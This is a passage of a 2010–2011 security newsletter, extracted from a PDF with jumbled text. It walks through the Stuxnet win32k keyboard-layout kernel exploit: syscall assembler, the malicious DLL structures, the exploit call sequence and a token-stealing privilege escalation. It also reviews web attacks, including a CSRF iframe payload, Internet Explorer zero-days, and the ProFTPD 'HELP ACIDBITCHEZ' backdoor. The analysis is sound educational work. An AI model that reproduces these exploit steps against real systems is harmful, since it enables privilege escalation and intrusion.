It is normally impossible to load a Keyboard Layout, other than that of the system, as an ordinary user. By looking more closely at this function, we notice that it uses a system call "win32k! NtUserLoadKeyboardLayoutEx" (present in win32k.sys). The prototype for this function is available in the documentation on ReactOS *. The call takes 7 parameters, the rst of which corresponds to a HANDLE.
This value (HANDLE) corresponds to one of the Keyboard Layout les. We can use the Windows API "CreateFile()" function to open our specially-designed Keyboard Layout and recover a valid HANDLE corresponding to our le. In order to check which parameters must be passed to this function, we are going to study how it is called using a Windows debugger. For this, we are going to put breakpoint on the system call "win32k! NtUserLoadKeyboardLayoutEx".
Wade Kelly
* Free OS compatible with Windows XP
WWW.XMCO.FR
ACTU SCU 27
1er paramtre
dernier paramtre
Dclenchement de lappel de NtUserLoadKeyboardLayoutEx
g: continue execution of the program dps: display the content of the stack !handle: display the information on the specied handle We can see that the 1st parameter is indeed our HANDLE. The 2nd parameter corresponds to offsets. It is formed of two groups of two bytes, here OxOOOO and Ox1768. The 3rd parameter is a pointer towards a UNICODE_STRING structure representing the name of the Keyboard Layout. We can put an arbitrary value into it. The 4th parameter also represents a HANDLE, but one that is more specic. This is because it represents the keyboard Layout that is currently used. The 5th parameter is again a pointer to a UNICODE_STRING structure representing the ID of the layout. The 6th parameter is a value representing a Keyboard Layout identier. Lastly, the 7th parameter is a ag. Ox82 represents the ags Ox2 (KLF _SU8STITUTE_OK) and Ox8 (KLF _NOTELLSHELL). The system call is not accessible directly. Consequently, we have to use assembler code to make the call. Under
Windows XP, it is possible to pass control to the kernel using the instruction "sysenter". The APIs available in user32.dll and ntdll.dll all use the same method to make this system call under Windows XP. [0] mov eax, XXXh [1] mov edx, 7FFE0300h [2] call dword ptr [edx] [3] retn 1Ch Code for making the syscall [0] eax is used to specify the number of the system call used. The list of system calls is available on the Internet. That of "NtUserLoadKeyboardLayoutEx" is Ox11 C6. [1] We place the address Ox7FFE0300 in the register EDX. At this address, which is xed under Windows XP, is a pointer towards the following assembler instructions for moving to ring 0. mov edx,esp sysenter
WWW.XMCO.FR
ACTU SCU 27
the input language associated with the keyboard using the shortcut alt+shift, a new icon with question marks (?) appears as well as the icons "FR" and "EN" corresponding to the two keyboard layouts loaded on our system.
SHIFT+ALT
dd: ok u: disassemble from the given address [2] The call to assembler instructions located at the address referenced by edx (Ox7FFE0300) allows entry into ring 0. [3] Finally, this last assembler instruction resumes execution of the program in ring 3. To be sure that we have a valid Keyboard Layout, we simply copy kbdfr.dll and we attempt to load it. In our exploitation code, we use a function of the "naked" type so as not to be bothered by the assembler prolog (push ebp; mov ebp, esp). Our Keyboard layout is therefore correctly applied. It corresponds exactly to the layout of the French keyboard that was previously loaded. The vulnerability is based on the fact that the 2nd argument passed to NtUserLoadKeyboardLayoutEx represents two offsets, each stored over two bytes. When loading a French keyboard, the default value is Ox1768.
The code corresponding to the _asm block corresponds to the system call used. We are going to use the values recovered from the breakpoint to stay as close as possible to valid values.
Here, hFile is a HANDLE corresponding to our copy of kbdfr.dll. The 2nd argument is an offset pointing to a structure contained in kbdfr.dll. We use the value observed with the debugger, to be sure of having a correct value.
Once the code is executed, it appears that nothing has happened. However, we may notice that when changing
WWW.XMCO.FR
emdot

In order to be able to reach the vulnerable code xxxKENLSProcs, we are going to modify this value to point towards the structure KBONLSTABLES (see below) added within our malicious kbdfr.dll le.
ACTU SCU 27
Content of the modied library (DLL) We write both structures directly into our copy of the le kbdfr.dll. Here, we choose to modify a text zone for greater simplicity. It should be noted that it is not necessary for loaded le to be a valid PE binary For example, Stuxnet used a text le containing these two structures and not a full valid Keyboard Layout le. In the 2nd parameter, we pass the offset where the KBONLSTABLES structure is located.
When the keyboard is loaded and the user presses a button, the function xxxKENLSProcs is called. A check is made on a global variable gpKbdNlsTbl. This value represents our offset passed as the 2nd argument when loading the Keyboard layout.
order to be able to reach the vulnerable code xxxKENLSProcs, we are going to modify this value to point towards the structure KBONLSTABLES (see below) added within our malicious kbdfr.dll file.
Here are the two structures to be added to our malicious DLL. These structures are constituted as follows:
In
INFO
Analyse diffrentielle du correctif MS10-073
Microsoft a corrig cette vulnrabilit avec le correctif MS10-073. Pour cela, quelques lignes de codes ont t ajoutes (en rouge) afin de contrler que la valeur de lindex soit infrieure 3.
In order to execute the code present at the address Ox60636261 located at index 5 of table win32k! aNLSVKFProc, the variable NLSFEProcType of the structure VK_F needs to be set to 5. The code corresponding to the Virtual Key (variable Vk) is an arbitrary value that we must reuse later on. We will leave this value at 0 (like stuxnet) for greater simplicity.
All the other variables can be set to 0. pVkToF is a relative virtual address (RVA). Which gives us:
WWW.XMCO.FR
The variable pVkToF of the structure KBONLSTABLES must point to the structure VK_F. Given that we need a structure VK_F to trigger the vulnerability, we are going to set NumOfVkToF to 1.

The exploitation code Let's examine our code in order to understand the sequence of events during exploitation. 1. Recover the HANDLE corresponding to the current Keyboard Layout returned by the API function "GetKeyboardLayout()" so that a valid value can be used. HKL hKL = GetKeyboardLayout(GetCurrentThreadId ()); 2. Load our malicious Keyboard Layout by using our parameters (including the previously-recovered value so that it can be passed as the 4th parameter (hKL)) with the system call NtUserLoadKeyboardLayoutEx) NtUserLoadKeyboardLayoutEx(hFile, 0x1B001768, &emptySTRING, hKL, &puszKLID, 0x09990999, 0x82); 3. Activate our Keyboard Layout using the API function ActivateKeyboardLayout() taking as a parameter our hKLActivateKeyboardLayout(hKL, Ox82); 4-5. Exploit the vulnerability with a Windows API for simulating the newly mapped key corresponding to the value of the Virtual Key Vk specied in the structure VK_F. SendInput(1, &key, sizeof(key));
ACTU SCU 27
6. Program halt (crash) at address Ox60636261. The exploitation of the vulnerability is successful.
For example, by specifying an index of 5,

we can redirect the call to the address Ox60636261 located in the user area, where we may have previously placed our malevolent code. 11
Technical solution for changing the permissions of the current process from the kernel area. Lastly, the nal stage consists of elevating our privileges by using our own payload (shell code) located at the address Ox60636261. For this, it is necessary to allocate memory using the VirtualAlloc() API function, then to place our payload within it. As the address Ox60636261 is located within the user area, this is no problem.
WWW.XMCO.FR
ACTU SCU 27
The payload will then be executed in the same context as the kernel, namely the 0 ring.
References!
Vupen's analysis h t t p : / / w w w . v u p e n . c o m / b l o g / 20101018.Stuxnet_Win32k_Windows_Kernel_zeroday_Exploit_CVE-2010-2743.php
Our payload must be able to execute the following actions: 1) Browse the processes open on the system. 2) Find a SYSTEM process. 3) Copy the token for this process. 4) Copy this token into our own process.
ESET's analysis http://blog.eset.com/2010/10/15/win32k-sys-about-thepatched-stuxnet-exploit
Our elevation of privileges is now nished. Our process is now running with SYSTEM privileges.
Execution of the program from a user account
WWW.XMCO.FR
L'ACTU SCU N27
Current news...
What has been happening over the last few weeks within the small world of IT security?
As at the end of each year, Jeremiah Grossman presented the top 10 hacking techniques. Some zero-
CURRENT NEWS
day vulnerabilities discovered within Internet Explorer spoiled Microsoft's Christmas holidays. Lastly, we will return to a
particularly-successful attack on servers hosting the ProFTPD project and we will assess the second edition of GS Days.
Adrien GUINAULT
Sharon Pruitt
Penetration test/attacks: Top 10 techniques of the year 2010 Zero-day vulnerability: Microsoft Internet Explorer import CSS Conference: The GS Days 2010 Attack/Cyber criminality: Zero-day attack on servers hosting the ProFTPD project
[38]
WWW.XMCO.FR
ACTU SCU 27
Top 10 hacking techniques 2010
Each year since 2006, Jeremiah Grossman has put together the "top 10" new web attacks of the previous year. The process of selection, which applies to the 69 new techniques that were on the list in 2010, has been reviewed. To establish the top 15, Internet users initially voted for their favorite new techniques. Then, a panel of security experts classied this top 15 to obtain the top 10 new web attacks of 2010. Here is a quick summary of the attacks which have marked the year 2010.
Padding oracle (Juliano Rizzo, Thai Duong)

Juliano Rizzo and Thai Duong are at the top of this list with their research into Padding Oracle which we present in detail in the next issue.
Juliano Rizzo and Thai Duong are at the

top of this list with their research into Padding Oracle which we present in detail in the next issue ...
Evercookie (Samy Kamkar)

Evercookie is an API developed in JavaScript. It can force a browser to store a cookie permanently. To do this, Evercookie uses numerous techniques (HTTP cookie, Flash cookies, Silverlight storage, Web history, ETags, web cache , etc,) to store a cookie in numerous locations. Therefore, a cookie cannot be deleted via standard functions offered by web browsers.
http://samy.pl/ Each technique is very interesting, such as the creation of a PNG image from a cookie.
[39]
WWW.XMCO.FR
The codes and the description of the techniques used are available at the following address:
AlaskaTeacher
PENETRATION TEST/ATTACKS: TOP 10 HACKING TECHNIQUES 2010

Hacking Auto-Complete (Jeremiah Grosman)
As usual, Jeremiah Grossman was in the top three of this list, with several vulnerabilities identied within the main browsers on the market. His research showed that it was possible to manipulate browsers' caches, particularly information saved when HTTP forms are submitted. When HTTP forms use the attribute autocomplete=off, this parameter tells browsers not to save the information. In most of the forms found on the Internet, this attribute is not used. It therefore makes it easier for Internet users to complete forms.
ACTU SCU 27
Attacking HTTPS with Cache Injection (Elie Bursztein, Baptiste Gourdin, Dan Boneh)
The HTTPS Cache injection attack consists of injecting a JavaScript library within a browser, in order to intercept the data exchanged between the victim and a website based on the HTTPS protocol. According to the author, 43% of the top 10,000 sites use external JavaScript libraries. Consequently, if a pirate compromises a site hosting one of these libraries, it may affect the condentiality of the sites that use this code.
Through some ingenious JavaScript code, Jeremiah showed that this information could easily be disclosed. Different code is offered for the four main browsers, either to write within the cache or to read information. The most interesting of these four proofs of concept concerns Internet Explorer 6 and 7. The JavaScript code that is offered allows the use of the "down" button when a user is on an entry eld. This will automatically show the various proposals contained within the browser. This code will then go into the history and auto-submit the content to a third-party domain controlled by the pirate.
His research showed that it was possible

to manipulate browsers' caches, particularly information saved when HTTP forms are submitted ... " .
In other words, the malicious JavaScript code that is loaded will intercept the data exchanged between the victim's browser and the website that uses the library in question. The authors gave no further explanations. They nevertheless put several videos online. Their proofs of concept work, but several limitations make exploitation
WWW.XMCO.FR

difcult: - The error message on the validity of the certicate is displayed on the screen. - Under Internet Explorer, several display bugs and a slowdown could quickly raise the suspicions of an Internet user. The demonstration is nevertheless impressive. Using this method, the researchers were able to steal connection identiers for sites such as Twitter or Blogger.com.
ACTU SCU 27
The code checks that the token submitted by the user is valid before updating the e-mail address. A legitimate request sent from the HTML form would be as follows:
However, if the victim visits a website which uses an iFrame as follows: < i f r a m e s r c = " h t t p : / / w w w. e x a m p l e . c o m / updateEmail.jsp?email=evil@attackermail.com"> The victim will, without their knowledge, send a POST request as follows:
Bypassing CSRF protections with ClickJacking and HTTP Parameter Pollution (Lavakumar Kuppan, Manish Saindane)
ClickJacking attacks already caused considerable comment some time ago. With proof of concept and presentations at Black Hat, the subject has been examined in depth. Lavakumar Kuppan and Manish Saindane presented a technique for bypassing the CSRF protection in place on JSP and ASP.NET applications. An example will illustrate this better than any explanations. Imagine an application which, once authenticated, allows its e-mail address to be updated. To protect itself against CSRF attacks, the developers add a unique token in a hidden eld when the update form is accessed. Consequently, the JSP code will have to process two email elds: one coming from the URL and the other coming from the arguments of the POST request. This dual use is an attack technique called HTTP parameter pollution, which can trap the JSP code that processes the eld received in the URL rst. Therefore, a pirate can use this method to force a connected user to change their e-mail address without their knowledge, while bypassing the anti-CSRF code.
Universal XSS in IE8 (Eduardo Vela - sirdarckcat, David Lindsay - thornmaker)

Without going into the details, the two researchers showed various techniques for carrying out Cross-Site Scripting within Internet Explorer 8, bypassing the lters implemented within this new browser.
In this case, the page that will process the received data is a JSP page named updateEmail.jsp:
WWW.XMCO.FR

HTTP POST DoS (Wong Onn Chee, Tom Brennan)
Attacks of the "denial of service" type caused much comment, particularly with the "Slowloris" attack. The attack in question is based on the massive dispatch of HTTP requests of the POST type. A pirate rst sends the header of the POST request containing a valid content-length eld. Subsequently, the body of the HTTP request is sent to the server very slowly, while remaining sufciently quick to avoid being cut by the timeout. This behavior has the effect of forcing a server to exhaust its resources (memory and CPU), which, in the case of high demand, causes denial of service. According to the researcher, just several hundred such requests could crash a vulnerable server. Very quickly after their presentations, tools were published: RUDY (R-U-Dead-Yet) OWASP HTTP Post Tool These tools are very easy to use and can have disastrous consequences. The Slow Headers or Slow POST attack method, and the Connection Rate, are chosen.
ACTU SCU 27
scenario in which a pirate makes a webpage available containing a Java applet capable of carrying out such an attack. The malicious software would be provided to Internet users in the form of a game to attract them and cause them to execute the software. Finally, such an attack would be very difcult to trace, because of the disappearance of the traces. This is because as soon as a user closes the browser or empties the cache, the attack would stop from one of the zombies and no traces would remain on the workstation. Also, the more that this game is used by Internet users, the more the attack would be effective. A full presentation of this attack was given at the OWASP conference. http://www.hybridsec.com/papers/OWASP-UniversalHTTP-DoS.ppt
JavaSnoop (Arshan Dabirsiaghi)

After the diverse and varied web attacks, a tool also makes it into the top 10. JavaSnoop is a program for intercepting the methods and data used within a Java program. Java applications may often be audited using a decompiler such as Jad and a debugger attached to the program to be audited. However, JavaSnoop eliminates this stage and can intercept all inputs and outputs from the program.
Several seconds are enough to cause denial of service.
To nish, the researcher Onn Chee also presented a
WWW.XMCO.FR

CSS History Hack In Firefox Without JavaScript for Intranet Portscanning (Robert "RSnake" Hansen)
As usual, Robert Hansen, alias "Rsnake", comes within the top 10. This researcher and author of the ha.ckers, site, showed how to use the CSS history to identify internal IP addresses previously visited by a user. The CSS history is a subject addressed several times by Rsnake. The aim is to be able to identify the sites visited by an Internet user based on the CSS properties of the history, without using any JavaScript code.
ACTU SCU 27
http://p42.us/ie8xss/ http://cve.mitre.org/cgi-bin/cvename.cgi? name=CVE-2010-1489 http://bit.ly/fmSNzA
HTTP POST DoS http://www.darkreading.com/vulnerability-management/ 167901026/security/attacks-breaches/228000532/ index.html
JavaSnoop http://www.aspectsecurity.com/tools/javasnoop/
References
CERT-XMCO references CXA-2010-1178, CXA-2010-0916, CXA-2010-0502, CXA-2010-1621 http://jeremiahgrossman.blogspot.com/2011/01/top-tenweb-hacking-techniques-of-2010.html
CSS History Hack In Firefox Without JavaScript for Intranet Portscanning http://ha.ckers.org/blog/20100125/css-history-hack-inrefox-without-javascript-for-intranet-portscanning/
Java Applet DNS Rebinding http://blog.mindedsecurity.com/2010/10/java-dsnrebinding-java-same-ip-policy.html
Padding Oracle http://usenix.org/events/woot10/tech/full_papers/ Rizzo.pdf
Evercookie http://samy.pl/evercookie/
Hacking Auto-Complete http://jeremiahgrossman.blogspot.com/2010/08/ breaking-browsers-hacking-auto-complete.html http://blackhat.com/html/bh-us-10/bh-us-10briengs.html#Grossman
Attacking HTTPS with Cache Injection http://www.youtube.com/watch?v=bt0Qh9c59_c http://elie.im/talks/bad-memories
Bypassing CSRF protections with ClickJacking and HTTP Parameter Pollution http://blog.andlabs.org/2010/03/bypassing-csrfprotections-with.html Universal XSS in IE8
WWW.XMCO.FR
ACTU SCU 27
Daniel Horacio
Microsoft and IE
Let's import video clips!

Microsoft had a difcult year end with the discovery of several critical vulnerabilities affecting Internet Explorer. A vulnerability of the zero-day type was discovered within the Internet Explorer browser (versions 6, 7 and 8). It results from an error in the management of the "clip" attribute by the shared library mshtml.dll. Microsoft reacted by publishing the security bulletin referenced KB2458511 (CVE-2010-3962) then the bulletin MS10-090. Several weeks later new zero-day! This time, this second vulnerability came from a handling error when importing CSS styles, within the same shared library mshtml.dll. By getting a user to open a malicious web page, a pirate was able to corrupt the memory and take control of the target system. Exploitation of this vulnerability required the use of the "heap spray" technique so that the pirate could be sure of executing their malicious code. This critical vulnerability (CVE-201 0-3971) did not cause much of a reaction on the Internet. Although Microsoft took no less than two months to correct this major problem, Pirates did not really exploit this vulnerability although it affected all versions of Internet Explorer (6, 7 and 8). The difculty resulted in the circumvention of DEP (Data Execution Prevention) and ASLR (Address Space Layout Randomization). Although HD Moore quickly published a rst exploit within Metasploit, this was not reliable in all environments.
Microsoft alerted its clients (KB2488013) then, in February, corrected this vulnerability with bulletin MS11-003.
The
difficulty resulted in the circumvention of DEP and ASlR ...
INFO
Exploiting an IE vulnerability via an alternative browser.
Billy Rios, the famous security researcher, has just published an article presenting an attack vector that is interesting for exploiting the latest zero-day vulnerability in Internet Explorer. Using an alternative browser and Adobe Reader, it is possible to exploit this vulnerability. The PDF language allows the use of an API method called "app.launchURL ()". This function takes a URL that will be opened by the default browser. Consequently, a malicious PDF opened with an alternative browser such as Firefox would cause a predefined URL to be opened with the default browser (Internet Explorer). The users of this browser are therefore exposed to the exploitation of a vulnerability affecting Internet Explorer.
A proof of concept was put online on the researcher's blog: http://xs-sniper.com/sniperscope/Adobe/ BounceToIE.pdf
[44]
WWW.XMCO.FR
ZERO-DAY VULNERABILITIES: MICROSOFT AND IE

References:
CERT XMCO references: CXA-2010-1724, CXA-2010-1736, CXA-2010-1785, CXA-2010-1808, CXA-2010-1828, CXA-2010-1830, CXA-2011-0197
ACTU SCU 27
CVEreferences: http://cve.mitre.org/cgi-bin/cvename.cgi? name=2010-3962 http://cve.mitre.org/cgi-bin/cvename.cgi? name=2010-3971
Microsoftreferences: http://www.microsoft.com/technet/security/advisory/ 2458511.mspx http://www.microsoft.com/france/technet/security/ bulletin/ms10-090.mspx http://www.microsoft.com/technet/security/advisory/ 2488013.mspx http://www.microsoft.com/technet/security/bulletin/ MS11-003.mspx
Other references: http://www.wooyun.org/bugs/wooyun-2010-0885 http://seclists.org/fulldisclosure/2010/Dec/110 http://xcon.xfocus.net/XCon2010_ChenXie_EN.pdf http://www.breakingpointsystems.com/community/blog/ ie-vulnerability/
WWW.XMCO.FR
ACTU SCU 27
The GS DAYS 2010
Last 30 November, the second edition of GS days took place in the Espace Saint Martin in the very heart of Paris. This conference is a meeting place for two communities that are usually separate: researchers and other technicians on one side and decision-makers on the other. Sixteen conferences took place, covering technical, legal and organizational subjects. They allowed the 260 French-speaking participants to (re)discover numerous aspects related to security. Although all of these conferences were enticing, we had to make a selection. After a breakfast that brought together all participants around the stands belonging to the various partners of the event, Marc Brahmi quickly introduced the event This speech was the occasion to announce, to participants, the date of the third edition of GS Days. This will take place on 10 May 2011, in the Espace Saint Martin.
H@ckRAM (Arnaud Malard - Devoteam)

Subsequently, during the H@ckRAM conference, Arnaud Malard, a consultant at Devoteam, listed and described the various techniques for exploiting the content of a system's live memory. These techniques concern two contexts in particular: the post-mortem study and the attack on a system. This conference has the merit of presenting an overview of existing tools and techniques for accomplishing the objectives, which are: the extraction, analysis and manipulation of data contained in RAM.
Arnaud Malard listed and described the

various techniques for exploiting the content of the live memory of a system 11
Firstly, Arnaud Malard presented the various contexts from which it is possible to extract the content of this memory: live, from the le hyberle.sys during prolonged hibernation, from a "crashdump" following a crash, by using the DMA mechanism that is mainly used by the FireWire and PCMCIAIPC Card protocols, from a virtual machine of the VMware type and lastly, by carrying out a "coldboot" attack. After this rst part, Arnaud gave a quick demonstration of the "memdump" script, supplied within the Metasploit framework. Then he presented the various existing tools for analyzing all the information that is recovered in this way.
From legal to technical: putting one finger up to hacking (Diane Mullenex, Legal Practitioner Paul Such, SeRT Philippe Humeau, NBS System)
SCRT and NBS were respectively represented by Paul Suchs and Philippe Humeau. They were accompanied by Diane Mullenex, who is a legal practitioner. They began the day with an opening keynote address entitled "from legal to technical: putting one nger up to hacking!". Unfortunately, this introduction had to be cut short due to lack of time. This plenary session presented several points such as post-incident analysis (the context, the aim, prior questions, submission of a disk before a court and analysis of the memory), and that of catching someone in the act. The speakers, from technical and legal backgrounds, presented the main stages in preparing a legallyadmissible technical case, and the main errors that are easy to make. Even so, the conclusion was given that few cases get as far as trial: currently, most of them are concluded by a privately-negotiated arrangement.
[46]
WWW.XMCO.FR
CONFERENCE: THE GS DAYS 2010

After that, he listed certain sensitive data that could be obtained in this manner, such as BIOS passwords, LM/ NTLM hashes, the SAM database and LSA secrets, the passwords recorded by browsers and other fat clients and even the AES/RSA keys used by encryption solutions such as TrueCrypt. Lastly, the consultant showed several videos presenting the dangers associated with the control of live memory: an elevation of privileges of a process from a serial port, then the misappropriation of the Windows authentication process through the modication of two opcodes following a signature, via a modication of the hyberle.sys le, as well as via the DMA mechanism. In spite of a small question that remained unanswered on the estimate of the disruption to the content of live memory caused by exploiting a process, the consultant met all the expectations of his audience.
ACTU SCU 27
malicious code into an NX zone, transform this nonexecutable zone into an executable zone and lastly, to execute the code.
Return Oriented Programming (Jean-Baptiste Aviat - HSC)

Afterwards, Jean-Baptiste Aviat, from the consultancy HSC, presented a conference entitled "Return Oriented Programming": reminder and practice". This conference was very educational. It claried concepts that are often mentioned in the news but rarely dened. After a quick presentation of the "basic" stack overow and existing protection measures (canary, DEP/bit NX), the consultant introduced the "Return into Libc" method, which can bypass these protection functions. After this, the researcher presented various technical solutions that developers use to protect themselves against this attack technique (compilation without dangerous functions, compiling these functions so that their addresses contain OxOO, and the implementation of ASLR (Address Space Layout Randomization)). The researcher ended by presenting what is the current ultimate circumvention: ROP (Return Oriented Programming). This technique, which is usable when at least one library is not loaded with ASLR, is based on the use of "gadgets". Each of these pieces of assembler code has two characteristics: a unique address, and a "ret" instruction that terminates the instructions. Using these, it is possible to write the different addresses of the gadgets beyond the buffer in order to chain their calls using "ret". Each of these gadgets will be responsible for a very specic task, in order to copy
INFO
GS DAYS returns
After the success of the first two editions, GS DAYS will very soon return on 10 May 2011, from 08:30 to 18:00 at the Espace Saint Martin. This third edition following subjects: The security and systems of will address the
industrial
networks
The efficient use of connection data Dualistic use of workstations The call for launched. papers has already been
Contact and information: http://www.gsdays.fr/
WWW.XMCO.FR

The security of Android (Nicolas Ruff - EADS)
After a long break for lunch, the researcher Nicolas Ruff from EADS led a conference on the security of the Android ecosystem. This very personal presentation gave the audience a quick introduction to the market context of smart phones, its architecture, the security mechanism of its operating system and its limits.
ACTU SCU 27
Internet. Lastly, he ended his conclusion by presenting a "hand-made" circuit for simulating a specic autonomous RFID system, using a roll of toilet paper as an antenna support. The researcher concluded his presentation by stating that speaking of the security of an RFID system could mean anything or nothing. It is important to know what a given system allows to be done, so as not to have a false impression of security.
Telecommuting: the frontier between private and public life (Catherine Duval and Yann Fareau Devoteam)
The following conference was led by Catherine Duval and Yann Fareau. It was entitled "Telecommuting: the frontier between private and public life". Between social, legal and environmental developments, this long appraisal of telecommuting in France gave a complete presentation of the major issues associated with this new way of working. The various components (managerial, legal and practical) were reviewed.
Nicolas will return to the SSTIC with the same subject, doubtless with more material and we hope for some demonstrations!
Saad Irfan
XSSF: demonstrating the danger of XSS (Ludovic Courgnaud and Imad Abounasr - Conix)
The nal technical conference, called "XSSF: demonstrating the danger of XSS" caused quite a reaction in the audience. Firstly, the two consultants from Conix, Ludovic Courgnaud and Imad Abounasr, presented the risks associated with exploitation of vulnerabilities of the XSS type, and the low importance that is still associated with them. Then they spoke of XSSF, a tool specially developed for this. This framework is based on Metasploit. Just like BeeF, it allows control to be taken of systems by exploiting vulnerabilities present in the operating system (e.g.: hcp, LNK), in the web browser, or in its plug-ins, simply by using JavaScript to force a browser to execute certain actions. This stage can control a set of bots that can be used subsequently. For example, pirates could use it as a relay for carrying out attacks. The two consultants showed how easy it was to go from an XSS on the site belonging to Norton/Symantec to the construction of a genuine botnet. The presentation ended by a discussion between consultants and decision-makers on the legality of a French company making the code for a "hacking" tool available.
RFID : Radio Frequency Insecure Device (Serigo Domingues - SCRT)

A conference entitled "RFID: Radio Frequency Insecure Device?" was then given by Sergio Alves Domingues from SCRT. After a quick presentation of the characteristics specic to RFID systems, the researcher gave a case study on the EM410X system. This is supposed to provide proven security because it is available solely in "read-only" mode; and it contains only a single identier, according to the manufacturer. However, the researcher showed what it was possible to do according to three attack models: collision, cloning and emulation. The large number of bits (40) over which the unique identier is coded makes collision difcult. Nevertheless, using cloning and emulation, it is extremely simple to create an apparent copy of this autonomous system. The researcher presented a "copier", which could be bought for a few dollars on the
WWW.XMCO.FR

Other conferences
Finally, the day ended with lessons learned, jointly presented by France Paris and EdelWeb. The conference "Integrating security into a project with signicant regulatory, technical and timetable constraints: lessons learned from online games" presented the management of each stage by both parties, from the denition to the implementation of an online game platform accredited by ARJEL.
ACTU SCU 27
Conclusion
This second edition of GS DAYS was particularly interesting. The conferences were of an excellent level and the days were very well organized. The GS DAYS compare well in relation to other international conferences.
References
Website and information http://www.gsdays.fr/
WWW.XMCO.FR
ACTU SCU 27
Jeff Keyzer
ATTAQUE PROFTPD
Servers belonging to ProFTPD compromised!

Modication of the le src/help.c During November, pirates broke into servers hosting the ProFTPD project. This attack was carried out on 28 November 2010 by exploiting a vulnerability that is still currently not disclosed. The pirates took advantage of this intrusion to replace the source code of ProFTPd version 1.3.3c, placing a stolen port The le help.c was modied with the following few lines of code:
The HELP ACIDBITCHEZ backdoor

The code added by the pirates gives access to a system on which ProFTPD is installed with the root user. For this, the pirates have added and modied two les within its source: Addition of le tests/test.c This le has been added within the source. When compiling the version of ProFTPD with the back door, a request is sent to a Saudi Arabian server (212.26.42.47) to warn the pirates of the presence of a new target.
Just giving the FTP command "HELP ACIDBITCHEZ" then allows a pirate to directly obtain a shell and take control of the server.
Zero-day or not zero-day

But how did the pirates get into these servers? The question is still not answered.
pirates took advantage of this intrusion to replace the source code of ProFTPd version 1.3.3c, placing a stolen port ...
The rst hypothesis would be the exploitation of a zeroday vulnerability. However, a question remains unanswered, which is why would the pirates have used this vulnerability on the software publishers' servers, with the risk that administrators would discover the vulnerability used, when they could have used it massively on all ProFTPD servers discovered on the Internet?
The
[50]
WWW.XMCO.FR
ATTACKS: ZERO-DAY AND PROFTPD

The second hypothesis concerns the exploitation of a vulnerability revealed at the same time by the magazine Phrack n043. A vulnerability affecting versions below 1.3.3d and 1.3rc1 related to an error within the function sqLprepare_where() in the SQL module. By sending specially-designed packets, a pirate could cause a buffer overow and take control of a system implementing ProFTPD.
ACTU SCU 27
References
CERT-XMCO references CXA-2010-1692, CXA-2010-1680, CXA-2010-1673 http://www.phrack.org/issues.html? issue=67&id=7#article http://xorl.wordpress.com/2010/12/02/news-proftpdowned-and-backdoored/
Neither of these two hypotheses was conrmed and the developers did not wish to reveal more.
Consequences...
Consequently, all versions downloaded between 28 November and 2 December contained malicious code. No gure was communicated on the number of downloads of this version, which was available for 5 days.
WWW.XMCO.FR
Si vous avez un doute, nous vous conseillons fortement If you have any doubts, we strongly advise you to search for the character string ACIDBITCHEZ within the binary for ProFTPD and if necessary download the latest published version (1.3.3d or 1.3rc1 ).
ACTU SCU 27
Our bookmarks, blogs and favorite tools
With
each we
publication, present extensions
in and
this our
section, Firefox
free
tools,
favorite websites.
For this edition, we have chosen to present two the auditing that are program useful IMA, tools
Wade Kelly
BLOGS, SOFTWARE AND TWITTER
for PCI DSS audits, a blog and our top Twitter profiles.
Adrien GUINAULT
On the agenda for this edition: IMA: Identity Management Auditor, an auditing tool developed by Yannick Hamon, consultant at XMCO. VMware compliance checker: tool for testing VMware environments for PCI DSS certication. The blog m_101: security blog specialized in the presentation of vulnerabilities and solutions to challenges. Top Twitter: a selection of Twitter accounts followed by CERT-XMCO.
[52]
WWW.XMCO.FR
ACTU SCU 27
IMA
Auditing permissions for systems and databases
Description
IMA is a program developed by Yannick Hamon, a consultant at XMCO. It can perform permissions audits on MSSQL, Oracle, Active Directory and Lotus Domino. This tool can quickly identify user proles (administrators, DBA, etc,) and test the robustness of passwords for all accounts.
How many times have you manually connected with Osql to an MSSQL database to extract the hashes, then passed them to John the Ripper? With IMA, one click is sufcient. Whether it is through local authentication or domain authentication, IMA recovers, audits, then reports the results in a directly-usable format (Excel, graph). It has several very useful functions: imports .pot les (John the ripper, export in different formats), Pass-The-Hash, password generators and SQL clients. Let's hope that IMA becomes the reference for security auditors!
Screenshot
Address XMCO opinion
http://www.xmco.fr/ima.html IMA has become an essential tool for our security audits. It becomes essential when it is necessary to audit dozens of Oracle and MSSQL databases or to check permissions on an instance of Active Directory. As the tool is developed and maintained in the author's free time, the author apologizes in advance for any potential bugs. Do not hesitate to report them or suggest new functionalities. For us, it is the best freeware of its kind;-)
[53]
WWW.XMCO.FR
ACTU SCU 27
VMware Compliance Checker

Auditing Windows systems
Description
Vmware Compliance Checker is a very useful tool for auditing Windows systems for PCI DSS audits. It reports the essential security points of a Windows system for reaching the requirements imposed by the PCI DSS 1.2 standard: presence of a personal rewall, unnecessary services, permissions, logs, password policy, etc.
Screenshot
Address
http://www.vmware.com/products/compliance-checker/
XMCO opinion
Combined with a tool such as MBSA for security patches, this tool checks that a Windows system complies with basic security principles.
[54]
WWW.XMCO.FR
ACTU SCU 27
m_101
Technical blog specialized in the exploitation of vulnerabilities
Description
Let's remain within the spirit of our rather technical article on the exploitation of Windows and Linux security vulnerabilities, with the blog m_101. This blog, written by a student with a keen interest in security, lets you follow and understand the resolution of challenges and the exploitation of vulnerabilities.
Screenshot
Address
Link: http://binholic.blogspot.com/ Twitter: http://twitter.com/w_levin
An excellent blog for an informed audience.
[55]
WWW.XMCO.FR
XMCO opinion
This blog will let you perfect your technical knowledge in highly varied elds, from the exploitation of Windows vulnerabilities to partial solution of challenges.
ACTU SCU 27
Twitter
Selection of Twitter accounts followed by CERT-XMCO
URL Type
Regvulture
http://twitter.com/regvulture
General info
honlinenews
http://twitter.com/honlinenews
Security info
helpnet
http://twitter.com/helpnetsecurity
Security info
hdmoore
http://twitter.com/hdmoore
Metasploit
xanda
http://twitter.com/xanda
Technical
CERT_Polska_en
http://twitter.com/CERT_Polska_en
Security info
schneierblog
http://twitter.com/schneierblog
Security info
taviso
http://twitter.com/taviso
Technical
ivanlef0u
http://twitter.com/ivanlef0u
Technical
msftsecresponse
http://twitter.com/msftsecresponse/
Security info
[56]
WWW.XMCO.FR
ACTU SCU 27
Acknowledgement s...
Vanessa Lynn
Cover * David Helan (davidhelan): http://helmen.blogspot.com/ http://www.ickr.com/photos/davidhelan/3443012216/
